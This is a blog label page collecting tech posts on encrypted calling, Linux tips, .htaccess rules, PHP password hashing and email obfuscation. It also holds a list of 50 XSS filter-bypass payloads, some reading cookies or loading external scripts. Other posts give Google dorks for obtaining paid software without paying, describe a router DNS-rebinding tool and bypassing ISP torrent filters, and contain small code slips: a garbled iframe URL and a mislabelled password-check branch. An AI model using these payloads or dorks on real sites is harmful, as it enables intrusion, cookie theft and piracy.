Showing posts with label web. Show all posts
Showing posts with label web. Show all posts
Thursday, 7 March 2013
Make An Encrypted Call On Android Using RedPhone
If you are quite worried about your privacy while making voice calls on your phone, RedPhone is a perfect tool to install in your android phone. RedPhone ensures that the eavesdropping attackers can not sniff your call by providing end-to-end encryption.
RedPhone is an open source communication encryption android software that well-integrates with the system dialer and lets you use the default system dialer and contacts apps to make calls as you normally would. The tool is written by Maxie Morlinspike, the same guy who wrote a famous tool called SSLStrip for performing HTTPS stripping attacks.
It is an open source tool licensed under GPL v3; the github README says, RedPhone is an application that enables encrypted voice communication between RedPhone users. RedPhone integrates with the system dialer to provide a frictionless call experience, but uses ZRTP to setup an encrypted VoIP channel for the actual call. RedPhone was designed specifically for mobile devices, using audio codecs and buffer algorithms tuned to the characteristics of mobile networks, and using push notifications to maximally preserve your device's battery life while still remaining responsive.
If you wish to understand more on Encryption protocol, you should refer to the WIKI.
Read more...
RedPhone is an open source communication encryption android software that well-integrates with the system dialer and lets you use the default system dialer and contacts apps to make calls as you normally would. The tool is written by Maxie Morlinspike, the same guy who wrote a famous tool called SSLStrip for performing HTTPS stripping attacks.
Install RedPhone
It is an open source tool licensed under GPL v3; the github README says, RedPhone is an application that enables encrypted voice communication between RedPhone users. RedPhone integrates with the system dialer to provide a frictionless call experience, but uses ZRTP to setup an encrypted VoIP channel for the actual call. RedPhone was designed specifically for mobile devices, using audio codecs and buffer algorithms tuned to the characteristics of mobile networks, and using push notifications to maximally preserve your device's battery life while still remaining responsive.
If you wish to understand more on Encryption protocol, you should refer to the WIKI.
Install RedPhone
Read more...
Bookmark this post: | 
|
E-Paath - A Perfect Computer-based Learning Tool For Your Children
If you are looking for good computer based learning materials for your small children, e-paaath (E-/Online Lesson) is a perfect choice esp. for the Nepali education scenario. I don't know how much has been done to take this software to the reach of the students/children but I think this software can be a very useful interactive learning material for children.
Developed by OLE Nepal in collaboration with the Department of Education (Nepal), this web-based software provides several modules of online lessons for classes 2-6. The software consists of 18-30 lessons organized in a weekly fashion for four subjects: Nepali, English, Mathematics, and Science. The contents for science are available in both English and Nepali languages. However, mathematics is available only in Nepali language.
E-paath is a flash based content and hence requires flash player and can be run through any of the major web browsers such as Mozilla Firefox, Google Chrome, etc. Since e-paath is a web based content, you can run it in any platform without any problem (I had to change a little bit of code in karma.html file to run the tool smoothly in Linux but its still fine; having a web server to serve the pages solves all errors though).
You can download e-paath from HERE. For installation help, you can refer to this page. You can also access the software online from HERE. Btw, there is no specifically linux version of tool available in the website (except for Sugar desktop environment) and don't try to mirror the online version of e-paath as flash contents seem to be internally referencing the configuration files. Your best bet is to download either of the two available versions and then delete all the unnecessary stuffs in there. It just runs fine.
Read more...
Developed by OLE Nepal in collaboration with the Department of Education (Nepal), this web-based software provides several modules of online lessons for classes 2-6. The software consists of 18-30 lessons organized in a weekly fashion for four subjects: Nepali, English, Mathematics, and Science. The contents for science are available in both English and Nepali languages. However, mathematics is available only in Nepali language.
E-paath is a flash based content and hence requires flash player and can be run through any of the major web browsers such as Mozilla Firefox, Google Chrome, etc. Since e-paath is a web based content, you can run it in any platform without any problem (I had to change a little bit of code in karma.html file to run the tool smoothly in Linux but its still fine; having a web server to serve the pages solves all errors though).
You can download e-paath from HERE. For installation help, you can refer to this page. You can also access the software online from HERE. Btw, there is no specifically linux version of tool available in the website (except for Sugar desktop environment) and don't try to mirror the online version of e-paath as flash contents seem to be internally referencing the configuration files. Your best bet is to download either of the two available versions and then delete all the unnecessary stuffs in there. It just runs fine.
Read more...
Bookmark this post: |
|
Tuesday, 29 January 2013
Swasthani.com Swasthani Ripper
Yesterday I came to know that I can listen Swasthani online at this site, www.swasthani.com and I decided to write a swasthani audio downloader. Since it would be useful for everyone, here is the script.
From the site itself, Sri Swasthani Brata Katha is a very popular ritual observed in Nepal in the Poush month (January – February) during winter. Goddess Sri Swasthani, known to grant wishes of her devotees, is worshipped for the whole month of Poush. The Swasthani Brat Katha (story) is recited everyday. The month long telling of the tales are dedicated to the Goddess and the stories that are mainly narrated are those of Swasthani Devi, Lord Shiva and other Gods.
Save the above file as swasthani, then chmod for executable permission and run it. If you have problem copying above code, you can check the Swasthani Downloader at GitHub. Enjoy listening Swasthani, geeks :)
Read more...
From the site itself, Sri Swasthani Brata Katha is a very popular ritual observed in Nepal in the Poush month (January – February) during winter. Goddess Sri Swasthani, known to grant wishes of her devotees, is worshipped for the whole month of Poush. The Swasthani Brat Katha (story) is recited everyday. The month long telling of the tales are dedicated to the Goddess and the stories that are mainly narrated are those of Swasthani Devi, Lord Shiva and other Gods.
#!/bin/bash ############################################### # Swasthani.com Swasthani Ripper # # Samar @ http://www.techgaun.com # ############################################### if [[ ! -f /tmp/swasthani.txt ]] then wget http://www.swasthani.com/ -O - | egrep '<li class="leaf( first| last)?"><a href="/swasthani/' | grep -o '<a .*href=.*>' | sed -e 's/<a /\n<a /g' | sed -e 's/<a .*href=['"'"'"]//' -e 's/["'"'"'].*$//' -e '/^$/ d' > /tmp/swasthani.txt fi while read -r line do wget "http://www.swasthani.com$line" -O - | egrep 'data="soundFile=http://www.swasthani.com/system/files/' | cut -d\" -f6 | cut -d= -f2 | wget -nc -i - done </tmp/swasthani.txt
Save the above file as swasthani, then chmod for executable permission and run it. If you have problem copying above code, you can check the Swasthani Downloader at GitHub. Enjoy listening Swasthani, geeks :)
Read more...
Bookmark this post: |
|
Friday, 11 January 2013
Java 0-day In The Wild - Disable Java Plugin NOW
Security researchers have discovered yet another critical Java 0-day exploit being used by majority of the browser exploit packs such as Blackhole and Cool. Users are urged to DISABLE the Java plugin RIGHT NOW.
French researcher Kaffeine discovered that the java 0-day has been spotted to be making big hits daily, in a blog post. This particular exploit has proven to be very serious threat for the users. The folks at AlienVault Lab have also reproduced the exploit and it seems to work over all the java versions across all platforms which is a very serious threat.
As for now, the users are highly urged to disable their JAVA plugins right now so that they do not get hit by these 0-days.
So what are you waiting for?
How To Disable Java Plugin
Kaffeine's blog post
Alien Vault Labs Post
Read more...
French researcher Kaffeine discovered that the java 0-day has been spotted to be making big hits daily, in a blog post. This particular exploit has proven to be very serious threat for the users. The folks at AlienVault Lab have also reproduced the exploit and it seems to work over all the java versions across all platforms which is a very serious threat.
As for now, the users are highly urged to disable their JAVA plugins right now so that they do not get hit by these 0-days.
So what are you waiting for?
Important links:
How To Disable Java Plugin
Kaffeine's blog post
Alien Vault Labs Post
Read more...
Bookmark this post: |
|
Thursday, 27 December 2012
The Scale Of Universe [A Must Watch]
Well this is so absofuckingly awesome that I decided it is worth making post about this particular site.
Without further delay, I present you this awesome link
I hope you loved the site like I did :)
Read more...
Scale of Universe
I hope you loved the site like I did :)
Read more...
Bookmark this post: |
|
Saturday, 8 December 2012
DNS Rebinding Attack Using Rebind
Rebind is a tool that implements the multiple A record DNS rebinding attack. Although this tool was originally written to target home routers, it can be used to target any public (non RFC1918) IP address.
Rebind provides an external attacker access to a target router's internal Web interface. This tool works on routers that implement the weak end system model in their IP stack, have specifically configured firewall rules, and who bind their Web service to the router's WAN interface. Note that remote administration does not need to be enabled for this attack to work. All that is required is that a user inside the target network surf to a Web site that is controlled, or has been compromised, by the attacker.
Download rebind
Tested Routers (Affected + Not affected)
Rebind FAQ
Defcon Slides
Kind of interesting vector and I guess many are vulnerable out there.
Read more...
Rebind provides an external attacker access to a target router's internal Web interface. This tool works on routers that implement the weak end system model in their IP stack, have specifically configured firewall rules, and who bind their Web service to the router's WAN interface. Note that remote administration does not need to be enabled for this attack to work. All that is required is that a user inside the target network surf to a Web site that is controlled, or has been compromised, by the attacker.
Important Links
Download rebind
Tested Routers (Affected + Not affected)
Rebind FAQ
Defcon Slides
Kind of interesting vector and I guess many are vulnerable out there.
Read more...
Bookmark this post: |
|
Monday, 19 November 2012
50 Awesome XSS Vectors From @soaj1664ashar
Here are 50 awesome XSS vectors that @soaj1664ashar has been tweeting over time. Can be quite useful for bypassing any filter with the help of these full baked vectors.
Or Grab from pastebin :)
Read more...
50 awesome XSS vectors that I have tweeted (@soaj1664ashar) over time. Enjoy! Now you can bypass any filter with the help of these full baked vectors :-)
1) <a href="javascript:\u0061le%72t(1)"><button>
2) <div onmouseover='alert(1)'>DIV</div>
3) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
4) <a href="jAvAsCrIpT:alert(1)">X</a>
5) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
6) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
7) <var onmouseover="prompt(1)">On Mouse Over</var>
8) <a href=javascript:alert(document.cookie)>Click Here</a>
9) <img src="/" =_=" title="onerror='prompt(1)'">
10) <%<!--'%><script>alert(1);</script -->
11) <script src="data:text/javascript,alert(1)"></script>
12) <iframe/src \/\/onload = prompt(1)
13) <iframe/onreadystatechange=alert(1)
14) <svg/onload=alert(1)
15) <input value=<><iframe/src=javascript:confirm(1)
16) <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
17) http://www.<script>alert(1)</script .com
18) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe>
19) <svg><script ?>alert(1)
20) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
21) <img src=`xx:xx`onerror=alert(1)>
22) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
23) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
24) <math><a xlink:href="//jsfiddle.net/t846h/">click
25) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
26) <svg contentScriptType=text/vbs><script>MsgBox+1
27) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
28) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
29) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
30) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
31) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
32) <object data=javascript:\u0061le%72t(1)>
33) <script>+-+-1-+-+alert(1)</script>
34) <body/onload=<!-->
alert(1)>
35) <script itworksinallbrowsers>/*<script* */alert(1)</script
36) <img src ?itworksonchrome?\/onerror = alert(1)
37) <svg><script>//
confirm(1);</script </svg>
38) <svg><script onlypossibleinopera:-)> alert(1)
39) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
40) <script x> alert(1) </script 1=2
41) <div/onmouseover='alert(1)'> style="x:">
42) <--`<img/src=` onerror=alert(1)> --!>
43) <script/src=data:text/javascript,alert(1)></script>
44) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
45) "><img src=x onerror=window.open('https://www.google.com/');>
46) <form><button formaction=javascript:alert(1)>CLICKME
47) <math><a xlink:href="//jsfiddle.net/t846h/">click
48) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
49) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
50) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
Or Grab from pastebin :)
Read more...
Bookmark this post: |
|
PHP 5.5 To Include Simple And Secure Password Hashing API
Few days ago, we saw the release of PHP 5.5.0 Alpha 1 to the public. The PHP development team is serious about addressing all the criticism it gets time and again. With the recent leaks of several high profile sites, a simple to use yet secure password hashing API has been introduced now.
Here's the RFC for simple password hashing API proposed by ircmaxell and now it has been implemented as a PHP core in 5.5.0 Alpha 1 release and will continue to be part of the PHP core in future releases.
In case you would like to use the API functions in older releases, there's a compatible PHP library for PHP >= 5.3.7. The reason for this is that PHP prior to 5.3.7 contains a security issue with its BCRYPT implementation.
Basically the idea behind simple password hashing API is that most of the PHP developers either don't understand or don't think worth the effort the whole concept of strong password hashing. By providing a simple API that can be called, which takes care of all of those issues for you, hopefully more projects and developers will be able to use secure password hashing.
Using the API is quite simple. All you have to do to get the hash is:
Verifying the password is also quite simple.
The simple password hashing API provides sets of password_* functions for the developers to make use of strong password hashing.
RFC for simple password hashing API
Designing an API
PHP 5.5.0 Alpha 1 released
Read more...
Here's the RFC for simple password hashing API proposed by ircmaxell and now it has been implemented as a PHP core in 5.5.0 Alpha 1 release and will continue to be part of the PHP core in future releases.
In case you would like to use the API functions in older releases, there's a compatible PHP library for PHP >= 5.3.7. The reason for this is that PHP prior to 5.3.7 contains a security issue with its BCRYPT implementation.
Basically the idea behind simple password hashing API is that most of the PHP developers either don't understand or don't think worth the effort the whole concept of strong password hashing. By providing a simple API that can be called, which takes care of all of those issues for you, hopefully more projects and developers will be able to use secure password hashing.
Using the API is quite simple. All you have to do to get the hash is:
$hash = password_hash($password, PASSWORD_BCRYPT);
Verifying the password is also quite simple.
if (password_verify($password, $hash)) {
// pass is correct :)
} else {
// pass is correct :/
}
The simple password hashing API provides sets of password_* functions for the developers to make use of strong password hashing.
Reading materials
RFC for simple password hashing API
Designing an API
PHP 5.5.0 Alpha 1 released
Read more...
Bookmark this post: |
|
Sunday, 11 November 2012
Wappalyzer - Browser Extension To Identify Web Servers
Wappalyzer is a very useful browser extension that reveals the web technologies and server softwares used behind to empower any webpage. This extension identifies different CMS, e-commerce portals, blogging platforms, web servers, frameworks, analytic tools, etc.
This very useful browser extension is available for Mozilla Firefox and Google Chrome. It is quite useful in server fingerprinting and identification steps. Wappalyzer tracks and detects several hundred applications under several categories.
Wappalyzer for Mozilla Firefox
Wappalyzer for Google Chrome
Wappalyzer @ GitHub
Once you install the addon and reload the browser, you will see the icons for identified applications on the right side of address bar (near to the bookmark & reload icon) in Mozilla Firefox. You can click in that area for more details.
One particular setting you would like to disable is the tracking and gathering of anonymous data which is *said* to be used for research purposes. You can turn off the tracking by going to the addon's preference page. Screenshot below shows the preference page in Mozilla Firefox.
Read more...
This very useful browser extension is available for Mozilla Firefox and Google Chrome. It is quite useful in server fingerprinting and identification steps. Wappalyzer tracks and detects several hundred applications under several categories.
Wappalyzer for Mozilla Firefox
Wappalyzer for Google Chrome
Wappalyzer @ GitHub
Once you install the addon and reload the browser, you will see the icons for identified applications on the right side of address bar (near to the bookmark & reload icon) in Mozilla Firefox. You can click in that area for more details.
One particular setting you would like to disable is the tracking and gathering of anonymous data which is *said* to be used for research purposes. You can turn off the tracking by going to the addon's preference page. Screenshot below shows the preference page in Mozilla Firefox.
Read more...
Bookmark this post: |
|
Thursday, 30 August 2012
How To Automatically Start Firefox In Private Browsing Mode
In this post, I will provide the instructions for few of the methods to automatically start firefox in private browsing mode.
Go to Edit -> Preferences and then select the Privacy tab. From the History dropdown list, choose the Firefox will Use custom settings for history and then check the Always use the private browsing mode option.
The second method involves changing the firefox configuration which can be accessed by typing about:config in the address bar. The first method described above essentially changes one particular preference name browser.privatebrowsing.autostart in background and this second method involves doing that background job manually on our own.
Once you open about:config configuration page, search for private and from the resulting list, modify the boolean value of browser.privatebrowsing.autostart to true by double clicking on it.
I hope this helps. If you got any other method, please drop it as a comment. :)
Read more...
Method 1
Go to Edit -> Preferences and then select the Privacy tab. From the History dropdown list, choose the Firefox will Use custom settings for history and then check the Always use the private browsing mode option.
Method 2
The second method involves changing the firefox configuration which can be accessed by typing about:config in the address bar. The first method described above essentially changes one particular preference name browser.privatebrowsing.autostart in background and this second method involves doing that background job manually on our own.
Once you open about:config configuration page, search for private and from the resulting list, modify the boolean value of browser.privatebrowsing.autostart to true by double clicking on it.
I hope this helps. If you got any other method, please drop it as a comment. :)
Read more...
Bookmark this post: |
|
Monday, 27 August 2012
How To Manually Install Flash Player 11 In Linux
This post will provide a step by step instructions for installing flash player 11 plugin in ubuntu 11.04 and other different versions and distros. This will be helpful for everybody who are having trouble with the software center like I had.
Make sure no firefox process is running and then fire up the terminal and type the following commands in order:
Once you have finished copying the shared object and other necessary files in their respective target directories, you can open the firefox and you're good to go. :)
Read more...
Make sure no firefox process is running and then fire up the terminal and type the following commands in order:
mkdir -p ~/flash && cd ~/flash
wget http://archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.238.orig.tar.gz
tar -zxvf adobe-flashplugin_11.2.202.238.orig.tar.gz
sudo cp -r libflashplayer.so /usr/lib/firefox/plugins
sudo cp -r usr/* /usr
wget http://archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.238.orig.tar.gz
tar -zxvf adobe-flashplugin_11.2.202.238.orig.tar.gz
sudo cp -r libflashplayer.so /usr/lib/firefox/plugins
sudo cp -r usr/* /usr
Once you have finished copying the shared object and other necessary files in their respective target directories, you can open the firefox and you're good to go. :)
Read more...
Bookmark this post: |
|
Saturday, 16 June 2012
IP Address Based Restriction Using Htaccess File
Sometimes you need to restrict access to files in your webserver to certain IP address or IP range only. In such case, you can apply a simple .htaccess rule and this post provides an information on how to make IP based restriction Using .htaccess.
First, be sure to enable use of htaccess in apache in your distro.
An example of .htaccess file that will block requests from all IP addresses but the subnet of 192.168.0.0/16 is as below:
Similarly, an example of .htaccess file that will allow requests from all IP addresses but the subnet of 192.168.0.0/16 is as below:
You can also specify the individual IP addresses instead of the entire subnet according to your need. Also, note that there should be no space after the comma between allow,deny.
Once you create the .htaccess file, make sure you've provided proper permission to it.
Once you have made the .htaccess file and provided the proper permission, you might need to restart the apache server(but per directory .htaccess does not require reloading the apache in most cases) so that new configurations will show an effect.
I hope this comes handy :)
Read more...
First, be sure to enable use of htaccess in apache in your distro.
An example of .htaccess file that will block requests from all IP addresses but the subnet of 192.168.0.0/16 is as below:
<limit GET>
order deny,allow
deny from all
allow from 192.168
</limit>
order deny,allow
deny from all
allow from 192.168
</limit>
Similarly, an example of .htaccess file that will allow requests from all IP addresses but the subnet of 192.168.0.0/16 is as below:
<limit GET>
order allow,deny
allow from all
deny from 192.168
</limit>
order allow,deny
allow from all
deny from 192.168
</limit>
You can also specify the individual IP addresses instead of the entire subnet according to your need. Also, note that there should be no space after the comma between allow,deny.
Once you create the .htaccess file, make sure you've provided proper permission to it.
samar@Techgaun:/var/www/samar$ chmod 0644 .htaccess
Once you have made the .htaccess file and provided the proper permission, you might need to restart the apache server(but per directory .htaccess does not require reloading the apache in most cases) so that new configurations will show an effect.
samar@Techgaun:/var/www/samar$ sudo service apache2 reload
I hope this comes handy :)
Read more...
Bookmark this post: |
|
Sunday, 3 June 2012
Check Your Plugins To Keep Firefox Updated and Safe
Mozilla foundation is now providing an online tool to check if the plugins you've installed are up to date or not using simple interface. The objective of this service is to keep your third-party plugins up to date which helps Firefox run safely and smoothly.
The service lets you check all the plugins and update the outdated ones from a simple UI in two major steps:
Step 1: Click Update to update a plugin.
Step 2: Complete all recommended updates before restarting your browser.
Head on to Firefox Browser Plugin Check & Updates.
Stay safe :)
Read more...
The service lets you check all the plugins and update the outdated ones from a simple UI in two major steps:
Step 1: Click Update to update a plugin.
Step 2: Complete all recommended updates before restarting your browser.
Head on to Firefox Browser Plugin Check & Updates.
Stay safe :)
Read more...
Bookmark this post: |
|
Monday, 9 April 2012
Email Obfuscation Tricks In The Age Of Spammers
Every day thousands of spam emails are propelled to our e-mail addresses and the algorithms used by the spam bots are increasingly getting sophisticated and are able to harvest few kinds of obfuscated e-mail addresses already. While this race between spammers and web users goes on, we can still use several of the obfuscation tricks either to prevent bots from harvesting the emails or to fool bots to pick completely wrong e-mail adresses. Here, I am going to illustrate some useful obfuscation tricks I've come across over.
A very basic way of obfuscating emails is by replacing the characters such as @ and . with at and dot. Following are few samples:
And, below are some examples that would be nearly impossible to harvest :P. Just be more creative with them and no automated spam bot/email harvester out there will be able to get you :D. However, this might possibly create some kind of DoS like scenario for many legitimate users.
The unicode version:
samar@techgaun.com
will properly show as:
samar@techgaun.com
you can specify the following CSS property to use this obfuscation trick.
Edit: I found this link with some good examples so I thought I would rather refer you all to this webpage.
Read more...
The Very Basics
A very basic way of obfuscating emails is by replacing the characters such as @ and . with at and dot. Following are few samples:
samar[at]techgaun[dot]com
samar (at) techgaun (dot) com
samar (at) techgaun (dot) com
And, below are some examples that would be nearly impossible to harvest :P. Just be more creative with them and no automated spam bot/email harvester out there will be able to get you :D. However, this might possibly create some kind of DoS like scenario for many legitimate users.
<myfirstname> (at) techgaun (dot) com
<myfirstname> (at) <lastname> (dot) com
<myfirstname> (at) <lastname> (dot) com
Using Image
Another method is to create a small and appropriate image that will display your e-mail address. Should be more than enough, so just create a PNG/GIF of your e-mail address.Text Encodings
You could perform text encodings and javascript obfuscations, etc. An example of this is using ascii to unicode conversion and applying other level of obfuscations again to it.The unicode version:
samar@techgaun.com
will properly show as:
samar@techgaun.com
Obfuscations using CSS
Reverse Text Direction
CSS allows you to display the text in the reverse direction. For a HTML entity,<div class="email"> moc.nuaghcet@ramas</div>
you can specify the following CSS property to use this obfuscation trick.
.email
{
unicode-bidi: bidi-override;
direction: rtl;
float: left;
}
Hidden Text Within E-mail address
Another method is to put some hidden html entity between the parts of e-mail address and then set its display style as none. The spam bots while trying to extract the data from such e-mail information are subjected to get wrong information. An example is:samar@tech<span class='display: none;'>nique</span>gaun.com
Edit: I found this link with some good examples so I thought I would rather refer you all to this webpage.
Read more...
Bookmark this post: |
|
Thursday, 29 March 2012
Extracting All Hyperlinks From Webpages - Python
In this example, I am going to show how easily you can extract all the links in a webpage using python. If you are learning to write some small scale crawler, this can be a quick startup on how you can extract the links in any webpage.
Basically, we will send the http request to any webpage and we will read the HTML response except in the case when the connection can not be established. In such case, we will simply inform the user that we could not connect to the website.
For all these stuffs, we will import few modules and most important ones are re and urllib2 for regular expression stuff and HTTP request/response stuffs respectively.
We then write the regex for the hyperlinks for which we will make a search in the HTML data we get back after sending the request from the server. Note the <a href=[\'"]?([^\'" >]+). The small brackets are there to let us capture our necessary information i.e. the actual links.
Now you understood what we'll be doing, below is the python script to extract the hyperlinks from any webpage.
Now run the script as python extracter.py http://www.techgaun.com or any URL you wish to.
So isn't it a good start for writing your own simple web crawler? :P
Read more...
Basically, we will send the http request to any webpage and we will read the HTML response except in the case when the connection can not be established. In such case, we will simply inform the user that we could not connect to the website.
For all these stuffs, we will import few modules and most important ones are re and urllib2 for regular expression stuff and HTTP request/response stuffs respectively.
We then write the regex for the hyperlinks for which we will make a search in the HTML data we get back after sending the request from the server. Note the <a href=[\'"]?([^\'" >]+). The small brackets are there to let us capture our necessary information i.e. the actual links.
Now you understood what we'll be doing, below is the python script to extract the hyperlinks from any webpage.
#!/usr/bin/python
import re, urllib2
from sys import argv
if (len(argv) != 2):
print "No URL specified. Taking default URL for link extraction"
url = "http://www.techgaun.com"
else:
url = str(argv[1])
links_regex = re.compile('<a href=[\'"]?([^\'" >]+)', re.IGNORECASE)
url_request = urllib2.Request(url)
try:
response = urllib2.urlopen(url_request)
html = response.read()
links = links_regex.findall(html)
print '\n'.join(links)
except urllib2.URLError:
print "Can't Connect to the website"
Now run the script as python extracter.py http://www.techgaun.com or any URL you wish to.
So isn't it a good start for writing your own simple web crawler? :P
Read more...
Bookmark this post: |
|
Tuesday, 28 February 2012
Reloading The Page Using Javascript
If you wish to put a nice little Reload this page link in your page, the javascript provides a reload() method that you can use for reloading the page.
The reload() method in window.location can be used to reload the page and works well in most of the browsers. An example snippet is shown below:
I hope this comes useful sometimes.
Read more...
The reload() method in window.location can be used to reload the page and works well in most of the browsers. An example snippet is shown below:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Reload example</title> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <meta name="generator" content="Geany 0.20" /> </head> <body> <iframe height="300" width="300" src="http://wwwindow.location.reload(true)w.google.com"></iframe> <a href="javascript:window.location.reload(true);">Reload this page</a>. </body> </html>
I hope this comes useful sometimes.
Read more...
Bookmark this post: |
|
Tuesday, 17 January 2012
Watch ASCII Star Wars Through Telnet
Just thought to share this cool link that features a star wars in the telnet. Telnet to the remote server and you'll be shown the star wars story.
Open your terminal and type the following:
And, the online web version is available at HERE
Read more...
Open your terminal and type the following:
telnet towel.blinkenlights.nl
And, the online web version is available at HERE
Read more...
Bookmark this post: |
|
Monday, 21 March 2011
Offline version of UnicodeNepali.Com V3 Converter
Sometimes, we might need to use unicodenepali.com converter and we might not have access to the internet. But, by just saving the complete webpage of the converter, you could get the offline version of the converter. Now you can take the downloaded html and its related files anywhere and open the html file to run the converter offline.
Even better, if you are windows user, you could save .hta version from Internet explorer and could make a single file of the converter in your own computer.
Go to the URL: http://www.unicodenepali.com/v3/convert.html
and press Ctrl+S to save the complete webpage. See the screenshot below:
Hope you find this useful.
Read more...
Even better, if you are windows user, you could save .hta version from Internet explorer and could make a single file of the converter in your own computer.
Go to the URL: http://www.unicodenepali.com/v3/convert.html
and press Ctrl+S to save the complete webpage. See the screenshot below:
Hope you find this useful.
Read more...
Bookmark this post: |
|
Saturday, 26 February 2011
How to get things for free in internet [Google dorks]
Well its been a few days I haven't posted. Today I have come with an interesting post that will help you get things for free in internet. Of course, it is not legal but it works in many cases but not always. And many of the results might be some craps.
Following are the list of the google dorks that will help you get some of the commercial softwares for free. Google dorks are the keyword phrases that can be searched with the google search engine.
The above dorks are just the examples. You can modify them and do some experiments on your own to search for specific domains, etc. I hope this is useful. Thanks :)
Read more...
Following are the list of the google dorks that will help you get some of the commercial softwares for free. Google dorks are the keyword phrases that can be searched with the google search engine.
intitle:"Thank You For Your Order" intext:Click Here to Download
intitle:"Thank You For Your Purchase" intext:Click Here to Download
inurl:/thankyou*.html intitle:Thank you for your order! intext:Click Here to Download
intitle:"Thank You For Your Order!" intext:download
inurl:thanks intext:"Thank You For Your Order!" "Click Here" filetype:html
intitle:"Thank You For Your Purchase" intext:Click Here to Download
inurl:/thankyou*.html intitle:Thank you for your order! intext:Click Here to Download
intitle:"Thank You For Your Order!" intext:download
inurl:thanks intext:"Thank You For Your Order!" "Click Here" filetype:html
The above dorks are just the examples. You can modify them and do some experiments on your own to search for specific domains, etc. I hope this is useful. Thanks :)
Read more...
Bookmark this post: |
|
Friday, 18 February 2011
Torrent 2 Text for bypassing .torrent filter by ISPs
I have just completed this pretty simple script to let you download the torrent files as text files. I wrote it because ISA server was actually blocking me to download the .torrent files so I quickly wrote this and now I am putting it online.
To use this little script, all you have to do is copy the link location of the .torrent file and paste in the textbox.
Torrent to text tool
Have fun :)
Read more...
To use this little script, all you have to do is copy the link location of the .torrent file and paste in the textbox.
Torrent to text tool
Have fun :)
Read more...
Bookmark this post: |
|
Subscribe to:
Posts (Atom)